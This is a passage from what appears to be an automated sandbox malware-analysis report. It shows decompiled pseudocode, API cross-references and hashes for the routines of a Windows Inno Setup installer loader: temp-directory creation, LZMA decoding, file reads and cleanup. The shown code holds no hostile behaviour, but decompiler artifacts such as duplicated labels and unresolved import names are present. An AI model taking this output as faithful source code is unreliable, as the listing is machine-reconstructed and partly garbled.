				E004031E8(0x40be14, _t56,  *((intOrPtr*)(_t81 - 0x10)), _t79, _t80);
				_t70 =  *0x40be14; // 0x20a0e4c
				E00408D30(0, _t56, 0x409db4, _t70, _t79, _t80, _t81 - 0x10); // executed
				E004031E8(0x40be18, _t56,  *((intOrPtr*)(_t81 - 0x10)), _t79, _t80);
				_t72 =  *0x40bdfc; // 0x134166
				E00407354(_t72);
				_push(_t81);
				_push(0x409b6d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t82;
				 *0x40be5c = 0;
				_t60 =  *0x40be18; // 0x20a0ef8
				_t27 = E00407110(_t60, 1, 0, 1, 0); // executed
				 *0x40bddc = _t27;
				 *[fs:eax] = _t82;
				_t29 =  *0x40be00; // 0xa0e00
				 *0x40be5c = E00402594(_t29,  *[fs:eax], 0x409b5c, _t81);
				_t57 =  *0x40be5c; // 0x20b8000
				_t75 =  *0x40be00; // 0xa0e00
				E0040277C(_t57, _t75);
				_push(_t81);
				_push(0x409ab8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_t62 =  *0x40bdd8; // 0x0
				_t35 = E004076B4(_t62, 1, "tv@"); // executed
				 *0x40be60 = _t35;
				_push(_t81);
				_push(0x409aa7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_t63 =  *0x40be00; // 0xa0e00
				_t37 =  *0x40be60; // 0x2158e04
				E00407944(_t37, _t63, _t57);
				_pop(_t78);
				 *[fs:eax] = _t78;
				_push(E00409AAE);
				_t40 =  *0x40be60; // 0x2158e04
				return E00402924(_t40);
			}

0x004098f8
0x004098f8
0x004098f8
0x004098f8
0x004098f8
0x004098fd
0x00409902
0x0040990e
0x00409912
0x00409917
0x00409920
0x00409927
0x00409937
0x0040993c
0x0040993c
0x00409948
0x00409955
0x0040995a
0x00409963
0x0040996b
0x00409983
0x00409985
0x0040998f
0x0040998f
0x00409983
0x00409994
0x0040999c
0x004099a9
0x004099b7
0x004099bf
0x004099cc
0x004099d1
0x004099dc
0x004099e3
0x004099e4
0x004099e9
0x004099ec
0x004099f1
0x004099fc
0x00409a09
0x00409a0e
0x00409a1e
0x00409a21
0x00409a2b
0x00409a30
0x00409a3a
0x00409a40
0x00409a47
0x00409a48
0x00409a4d
0x00409a50
0x00409a58
0x00409a65
0x00409a6a
0x00409a71
0x00409a72
0x00409a77
0x00409a7a
0x00409a7f
0x00409a85
0x00409a8a
0x00409a91
0x00409a94
0x00409a97
0x00409a9c
0x00409aa6

APIs

MessageBoxA.USER32 ref: 00409937
MessageBoxA.USER32 ref: 0040997B

Strings

tv@, xrefs: 00409A53
.tmp, xrefs: 004099B2
Win32s, xrefs: 00409920

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: .tmp$Win32s$tv@
API String ID: 2030045667-1766138599
Opcode ID: fe8222c45a2bf6f7d99121595f255d834ad8eb4905a9a336082ea23429ac2605
Instruction ID: dee1e90c638adaaa7d040f10d1271084d11f22890c3df03c25ae3000257ba05f
Opcode Fuzzy Hash: fe8222c45a2bf6f7d99121595f255d834ad8eb4905a9a336082ea23429ac2605
Instruction Fuzzy Hash: 08413A70610644ABD701FB65DD52A6A77A9EB49708F10487AF900B77E2CB7D6C00CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040900C Relevance: 7.5, APIs: 5, Instructions: 46
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0040900C(long __eax, void* __edx, long _a4) {
				long _v8;
				long _t4;
				void* _t8;
				long _t9;
				long _t11;
				void* _t13;
				void* _t14;

				_t4 = __eax;
				_v8 = _t9;
				_t11 = __eax;
				_t13 = __edx - 1;
				if(_t13 < 0) {
					L10:
					return _t4;
				}
				_t14 = _t13 + 1;
				_t8 = 0;
				L2:
				L2:
				if(_t8 != 1) {
					if(_t8 > 1) {
						Sleep(_a4);
					}
				} else {
					Sleep(_v8);
				}
				_t4 = E004034B8(_t11);
				_push(_t4); // executed
				L00404488(); // executed
				if(_t4 != 0) {
					goto L10;
				}
				_t4 = GetLastError();
				if(_t4 == 2) {
					goto L10;
				}
				_t4 = GetLastError();
				if(_t4 == 3) {
					goto L10;
				}
				_t8 = _t8 + 1;
				_t14 = _t14 - 1;
				if(_t14 != 0) {
					goto L2;
				}
				goto L10;
			}

0x0040900c
0x00409013
0x00409016
0x0040901a
0x0040901d
0x0040906e
0x0040906e
0x0040906e
0x0040901f
0x00409020
0x00000000
0x00409022
0x00409025
0x00409035
0x0040903b
0x0040903b
0x00409027
0x0040902b
0x0040902b
0x00409042
0x00409047
0x00409048
0x0040904f
0x00000000
0x00000000
0x00409051
0x00409059
0x00000000
0x00000000
0x0040905b
0x00409063
0x00000000
0x00000000
0x00409065
0x00409066
0x00409067
0x00000000
0x00000000
0x00000000

APIs

Sleep.KERNEL32(?,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040902B
Sleep.KERNEL32(?,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040903B
6D2B5F60.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409048
GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409051
GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040905B

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: eaa4b2f0d2dd5a2d7e75993b196d579a667b04b919be8dd75190cd2541dcc667
Instruction ID: 861fbaf215f69fbb0da9deec26b7cde67fa615360090588db58b17aae608382e
Opcode Fuzzy Hash: eaa4b2f0d2dd5a2d7e75993b196d579a667b04b919be8dd75190cd2541dcc667
Instruction Fuzzy Hash: 9AF0B4B290021427CB2475BE5C86A3F625CD991368725453BFA20F2283D53DCC0182BD

Uniqueness

Uniqueness Score: -1.00%

Function 00403DA6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403DA6(int __eax) {
				intOrPtr* _t7;
				intOrPtr* _t8;
				signed int _t15;
				signed int _t19;
				intOrPtr _t20;
				unsigned int _t21;
				char* _t29;
				char* _t30;
				void* _t46;

				 *0x40b020 = __eax;
				if( *0x40b030 == 0) {
					goto L5;
				} else {
					_t46 =  *0x40b414 - 1;
					if(_t46 < 0) {
						L17:
						ExitProcess( *0x40b020); // executed
					} else {
						if(_t46 == 0 || __eax != 0) {
							while(1) {
								L5:
								_t7 =  *0x40b024; // 0x0
								_t8 = _t7;
								if(_t8 == 0) {
									break;
								}
								 *0x40b024 = 0;
								 *_t8();
							}
							if( *0x40b028 != 0) {
								_t19 =  *0x40b020; // 0x0
								_t29 = "  at 00000000";
								do {
									_t2 = _t19 % 0xa;
									_t19 = _t19 / 0xa;
									 *_t29 = _t2 + 0x30;
									_t29 = _t29 - 1;
								} while (_t19 != 0);
								_t30 = 0x40a030;
								_t20 =  *0x40b028; // 0x0
								_t21 = _t20 - 0x401178;
								do {
									 *_t30 =  *((intOrPtr*)((_t21 & 0x0000000f) + 0x403ec0));
									_t30 = _t30 - 1;
									_t21 = _t21 >> 4;
								} while (_t21 != 0);
								if( *0x40b031 != 0) {
									E00404088(0x40b204, "Runtime error     at 00000000");
									E0040400B();
								} else {
									MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
								}
							}
							E00403D6C(0x40b038);
							E00403D6C(0x40b204); // executed
							E004019DC(); // executed
							if( *0x40b414 == 0) {
								E004030B4();
								goto L17;
							}
						}
					}
				}
				E004030B4();
				 *0x40b414 = 0;
				_t15 =  *0x40b020; // 0x0
				asm("sbb eax, eax");
				return  ~_t15 + 1;
			}

0x00403da8
0x00403db4
0x00000000
0x00403db6
0x00403db6
0x00403dbd
0x00403e83
0x00403e89
0x00403dc3
0x00403dc3
0x00403dcd
0x00403dcd
0x00403dcd
0x00403dd2
0x00403dd4
0x00000000
0x00000000
0x00403dd8
0x00403dde
0x00403dde
0x00403de9
0x00403deb
0x00403df0
0x00403dfa
0x00403dfc
0x00403dfc
0x00403e01
0x00403e03
0x00403e04
0x00403e08
0x00403e0d
0x00403e12
0x00403e17
0x00403e22
0x00403e24
0x00403e25
0x00403e25
0x00403e31
0x00403e52
0x00403e57
0x00403e33
0x00403e41
0x00403e41
0x00403e31
0x00403e61
0x00403e6b
0x00403e70
0x00403e7c
0x00403e7e
0x00000000
0x00403e7e
0x00403e7c
0x00403dc3
0x00403dbd
0x00403e8e
0x00403e93
0x00403e9a
0x00403ea1
0x00403ebd

APIs

MessageBoxA.USER32 ref: 00403E41
ExitProcess.KERNEL32 ref: 00403E89

Strings

Error, xrefs: 00403E35
Runtime error at 00000000, xrefs: 00403E3A, 00403E4D

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: c79c1e547e07a3d1ac10d563cbf51c4eb115eb0186fe91d057b894d5a3940c77
Instruction ID: e959e555da05728f6c5869fbe468bed2cd35297cb525c612a59fe2bc640103ba
Opcode Fuzzy Hash: c79c1e547e07a3d1ac10d563cbf51c4eb115eb0186fe91d057b894d5a3940c77
Instruction Fuzzy Hash: 9F21C130A203454AD710AF299A457163E99DB89709F04817BE610BB3E3C73D8A49C7EE

Uniqueness

Uniqueness Score: -1.00%

Function 00408E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00408E3C(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				int _t30;
				intOrPtr _t62;
				void* _t72;
				intOrPtr _t75;

				_t70 = __edi;
				_t53 = __ebx;
				_t54 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__edi);
				_t72 = __eax;
				_push(_t75);
				_push(0x408f2b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				while(1) {
					E00406B50( &_v12, _t53, _t54, _t70, _t72); // executed
					_t54 = 0x408f44;
					E00408D30(0, _t53, 0x408f44, _v12, _t70, _t72,  &_v8); // executed
					_t30 = CreateDirectoryA(E004034B8(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t53 = GetLastError();
					if(_t38 != 0xb7) {
						E004089C8(0x2f,  &_v28, _v8);
						_v24 = _v28;
						E00404C50(_t53,  &_v32);
						_v20 = _v32;
						E00407044(_t53,  &_v36);
						_v16 = _v36;
						E00408998(0x60, 2,  &_v24,  &_v12);
						_t54 = _v12;
						E0040584C(_v12, 1);
						E00402EB4();
					}
				}
				E0040322C(_t72, _v8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E00408F32);
				E004031B8( &_v36, 3);
				return E004031B8( &_v12, 2);
			}

0x00408e3c
0x00408e3c
0x00408e3f
0x00408e41
0x00408e42
0x00408e43
0x00408e44
0x00408e45
0x00408e46
0x00408e47
0x00408e48
0x00408e49
0x00408e4b
0x00408e4c
0x00408e50
0x00408e51
0x00408e56
0x00408e59
0x00408e5c
0x00408e63
0x00408e6b
0x00408e72
0x00408e82
0x00408e89
0x00000000
0x00000000
0x00408e90
0x00408e98
0x00408ea6
0x00408eae
0x00408eb6
0x00408ebe
0x00408ec6
0x00408ece
0x00408edb
0x00408ee0
0x00408eea
0x00408eef
0x00408eef
0x00408e98
0x00408efe
0x00408f05
0x00408f08
0x00408f0b
0x00408f18
0x00408f2a

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00408F2B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408E82
GetLastError.KERNEL32(00000000,00000000,?,00000000,00408F2B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408E8B

Strings

.tmp, xrefs: 00408E6B

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 045355d227cea6e7d5d416104fa9faf9719629bb9b9ae428ffd845c58668b2eb
Instruction ID: c921e9fa1f8d48812ad88111fc3c46dc83d8ac6a1a37af813a094dd237f4ea83
Opcode Fuzzy Hash: 045355d227cea6e7d5d416104fa9faf9719629bb9b9ae428ffd845c58668b2eb
Instruction Fuzzy Hash: AA211A75A002089BDB01FBA5C952ADEB779EF48304F10457FE541B73C1DA7C5E058AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00407B68 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 134
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00407B68(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t94;
				intOrPtr _t104;
				intOrPtr _t117;
				signed int _t120;
				void* _t123;
				char _t124;
				void* _t127;
				void* _t142;

				_v32 = 0;
				_t104 = __eax;
				_push(_t127);
				_push(0x407cf6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127 + 0xffffffdc;
				if( *((intOrPtr*)(__eax + 4))() != 1) {
					E00407A7C(1);
				}
				if( *((intOrPtr*)(_t104 + 4))() != 4) {
					E00407A7C(2);
				}
				if(_v12 < 0 || _v12 > 0x2000000) {
					E00407A7C(7);
				}
				if(_v5 >= 0xe1) {
					E00407A7C(3);
				}
				_v20 = 0;
				while(_v5 >= 0x2d) {
					_v20 = _v20 + 1;
					_v5 = _v5 - 0x2d;
				}
				_t123 = 0;
				while(_v5 >= 9) {
					_t123 = _t123 + 1;
					_v5 = _v5 - 9;
				}
				_v16 = 0;
				_t120 = E00408760(_v16, _t123);
				if((_t120 & 0x00000003) != 0) {
					_t120 = (_t120 | 0x00000003) + 1;
				}
				_v24 = _v12 + _t120;
				if( *(_t104 + 0x20) != _v24) {
					E00407B0C(_t104);
					_t94 = VirtualAlloc(0, _v24, 0x1000, 4); // executed
					 *(_t104 + 0x1c) = _t94;
					if( *(_t104 + 0x1c) == 0) {
						E00405840();
					}
					 *(_t104 + 0x20) = _v24;
				}
				_v28 =  *(_t104 + 0x1c);
				 *((intOrPtr*)(_t104 + 0x10)) = 0x407ad8;
				 *((intOrPtr*)(_t104 + 0x14)) = _t104;
				_t124 = E0040810C(_v28, _v16, _t120, _t104 + 0x10, _v12, _v28 + _t120, _v20, _t123);
				_t142 = _t124 - 1;
				if(_t142 >= 0) {
					if(_t142 == 0) {
						E00407A7C(4);
					} else {
						_v40 = _t124;
						_v36 = 0;
						E00405150("LzmaDecoderInit failed (%d)", 0,  &_v40,  &_v32);
						E00407A04(_v32, _t104, 0, _t120, _t124);
					}
				}
				 *(_t104 + 0x18) = _v28;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E00407CFD);
				return E00403198( &_v32);
			}

0x00407b73
0x00407b76
0x00407b7a
0x00407b7b
0x00407b80
0x00407b83
0x00407b95
0x00407b9c
0x00407b9c
0x00407bb2
0x00407bb9
0x00407bb9
0x00407bc2
0x00407bd2
0x00407bd2
0x00407bdb
0x00407be2
0x00407be2
0x00407be9
0x00407bf0
0x00407bf2
0x00407bf5
0x00407bf9
0x00407bff
0x00407c05
0x00407c07
0x00407c08
0x00407c0c
0x00407c17
0x00407c24
0x00407c2c
0x00407c31
0x00407c31
0x00407c37
0x00407c40
0x00407c44
0x00407c56
0x00407c5b
0x00407c62
0x00407c64
0x00407c64
0x00407c6c
0x00407c6c
0x00407c72
0x00407c7a
0x00407c81
0x00407c9f
0x00407ca3
0x00407ca6
0x00407ca8
0x00407cb1
0x00407caa
0x00407cbc
0x00407cbf
0x00407ccd
0x00407cd5
0x00407cd5
0x00407ca8
0x00407cdd
0x00407ce2
0x00407ce5
0x00407ce8
0x00407cf5

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407C56

Strings

-, xrefs: 00407BF9
LzmaDecoderInit failed (%d), xrefs: 00407CC8

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: -$LzmaDecoderInit failed (%d)
API String ID: 4275171209-4285503710
Opcode ID: 280b90f571de8d0f6a06e43fd61462bf54795dd090ff25f7ee4631c94334f9df
Instruction ID: 739e5406fed6d5d9f7dab0f1cecf33c4a84e0d5bdd5d63819edb2077d9ee3b07
Opcode Fuzzy Hash: 280b90f571de8d0f6a06e43fd61462bf54795dd090ff25f7ee4631c94334f9df
Instruction Fuzzy Hash: 42514370E082489FEB00DFA9C88579EBBB5EF49304F14817AA505F72C1D778A941CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00409D0A Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00409D0A(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t1;
				int _t2;
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t8;
				long _t10;
				void* _t11;
				intOrPtr _t12;
				void* _t17;
				void* _t18;

				_t18 = __esi;
				_t17 = __edi;
				_t11 = __ebx;
				_t1 =  *0x40bdd8; // 0x0
				_t2 = E00402924(_t1);
				if( *0x40be18 != 0) {
					_t10 =  *0x40be18; // 0x20a0ef8, executed
					_t2 = E0040900C(_t10, 0xd, 0xfa); // executed
				}
				if( *0x40be14 != 0) {
					_t8 =  *0x40be14; // 0x20a0e4c
					_t2 = RemoveDirectoryA(E004034B8(_t8)); // executed
				}
				if( *0x40a240 != 0) {
					_t2 =  *0x40a240; // 0x40228
					_push(_t2); // executed
					L004045A0(); // executed
				}
				if( *0x40bdc8 != 0) {
					_t3 =  *0x40bdc8; // 0x0
					_t12 =  *0x40bdcc; // 0x1
					E00403620(_t3, _t11, _t12, 0x408828, _t17, _t18);
					_t5 =  *0x40bdc8; // 0x0
					E004025AC(_t5);
					 *0x40bdc8 = 0;
					return 0;
				}
				return _t2;
			}

0x00409d0a
0x00409d0a
0x00409d0a
0x00409c7c
0x00409c81
0x00409c8d
0x00409c9e
0x00409ca3
0x00409ca3
0x00409caf
0x00409cb1
0x00409cbc
0x00409cbc
0x00409cc8
0x00409cca
0x00409ccf
0x00409cd0
0x00409cd0
0x00409cdc
0x00409cde
0x00409ce3
0x00409cee
0x00409cf3
0x00409cf8
0x00409cff
0x00000000
0x00409cff
0x00409d04

APIs

RemoveDirectoryA.KERNEL32(00000000,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CBC
740C9840.USER32(00040228,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409CD0

Part of subcall function 0040900C: Sleep.KERNEL32(?,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040902B
Part of subcall function 0040900C: 6D2B5F60.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409048
Part of subcall function 0040900C: GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 00409051
Part of subcall function 0040900C: GetLastError.KERNEL32(00000000,?,?,?,00000032,?,00409CA8,000000FA,00409D0F,000000FC,00409394,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 0040905B

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$C9840DirectoryRemoveSleep
String ID:
API String ID: 532274383-0
Opcode ID: ced7f35a4c7f2a956cb83ebc00fe38a8c3227ac322f81f8021bc59ed5727e9ea
Instruction ID: 46121217ae14b102a7c9ab0a2191daa408cf3cda942bec3b96eba668c110a116
Opcode Fuzzy Hash: ced7f35a4c7f2a956cb83ebc00fe38a8c3227ac322f81f8021bc59ed5727e9ea
Instruction Fuzzy Hash: A6F0C9706542019BD726EB29EE45B6672A4EF8030AF14443BE201763E2C77E5C91DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 004072EC Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E004072EC(intOrPtr* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t7;
				intOrPtr* _t12;

				_push(__ecx);
				_t12 = __eax;
				_t7 = ReadFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t7 == 0 && ( *((char*)(_t12 + 8)) != 0 || GetLastError() != 0x6d)) {
					E004072D8( *_t12);
				}
				return _v16;
			}

0x004072ef
0x004072f4
0x00407303
0x0040730a
0x0040731e
0x0040731e
0x0040732a

APIs

ReadFile.KERNEL32(?,0040BDE0,0000000C,?,00000000,0000000C,0040BDE0,0000000C,00000000,00407340,?,0040BDE0,?,0040975D,00000000,00409D05), ref: 00407303
GetLastError.KERNEL32(?,0040BDE0,0000000C,?,00000000,0000000C,0040BDE0,0000000C,00000000,00407340,?,0040BDE0,?,0040975D,00000000,00409D05), ref: 00407312

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 680202ba64e3e939a70e4bcc502f356e365af8173d4a0932f9b6ab517a08559d
Instruction ID: 3c0cfeec81fa0fc02a9cec973c06d08f825457161002b72a5b058ccb23915437
Opcode Fuzzy Hash: 680202ba64e3e939a70e4bcc502f356e365af8173d4a0932f9b6ab517a08559d
Instruction Fuzzy Hash: 33E092B1A081106BEB20A65AAC84FAB67DCCBC5324F04417BFE44DB281D678DC01C376

Uniqueness

Uniqueness Score: -1.00%

Function 0040736C Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E0040736C(intOrPtr* __eax, void* __edx) {
				long _v16;
				long _v20;
				long _t8;
				long _t9;
				intOrPtr* _t11;

				asm("movsd");
				asm("movsd");
				_t11 = __eax;
				_t8 = SetFilePointer( *(__eax + 4), _v20,  &_v16, 0); // executed
				_t9 = _t8 + 1;
				if(_t9 == 0) {
					_t9 = GetLastError();
					if(_t9 != 0) {
						_t9 = E004072D8( *_t11);
					}
				}
				return _t9;
			}

0x00407377
0x00407378
0x00407379
0x0040738b
0x00407390
0x00407391
0x00407393
0x0040739a
0x0040739e
0x0040739e
0x0040739a
0x004073a8

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040738B
GetLastError.KERNEL32(?,?,?,00000000), ref: 00407393

Part of subcall function 004072D8: GetLastError.KERNEL32(00000001,00407182,00000000,?,?,00000000,?,00000080,00000000,?,0040BDE0,?,?,0040971A,00000001,00000000), ref: 004072DB

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 057c581a682fd42bdcdafbb8af3d947b9e8f0f4bd48f50ce40414415dd734c82
Instruction ID: d341500aa86417baca15aecbf54a18501ed73b8cd6b72ca19bf93de83f54ea5b
Opcode Fuzzy Hash: 057c581a682fd42bdcdafbb8af3d947b9e8f0f4bd48f50ce40414415dd734c82
Instruction Fuzzy Hash: CDE092766081006BE600E59DC881A9B33DCDFC5364F10413ABA94EB1C0D675AC00C376

Uniqueness

Uniqueness Score: -1.00%

Function 004071D0 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004071D0(intOrPtr* __eax, long* __edx) {
				long _t8;
				long* _t11;
				intOrPtr* _t13;

				_t11 = __edx;
				_t13 = __eax;
				 *((intOrPtr*)(__edx + 4)) = 0;
				_t2 =  &(_t11[1]); // 0x409d75
				_t8 = SetFilePointer( *(__eax + 4), 0, _t2, 1); // executed
				 *_t11 = _t8;
				if( *_t11 == 0xffffffff) {
					_t8 = GetLastError();
					if(_t8 != 0) {
						return E004072D8( *_t13);
					}
				}
				return _t8;
			}

0x004071d2
0x004071d4
0x004071d8
0x004071dd
0x004071e7
0x004071ec
0x004071f1
0x004071f3
0x004071fa
0x00000000
0x004071fe
0x004071fa
0x00407205

APIs

SetFilePointer.KERNEL32(?,00000000,00409D75,00000001,00000000,00000001,0040774B,?,0040BDE0,?), ref: 004071E7
GetLastError.KERNEL32(?,00000000,00409D75,00000001,00000000,00000001,0040774B,?,0040BDE0,?), ref: 004071F3

Part of subcall function 004072D8: GetLastError.KERNEL32(00000001,00407182,00000000,?,?,00000000,?,00000080,00000000,?,0040BDE0,?,?,0040971A,00000001,00000000), ref: 004072DB

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

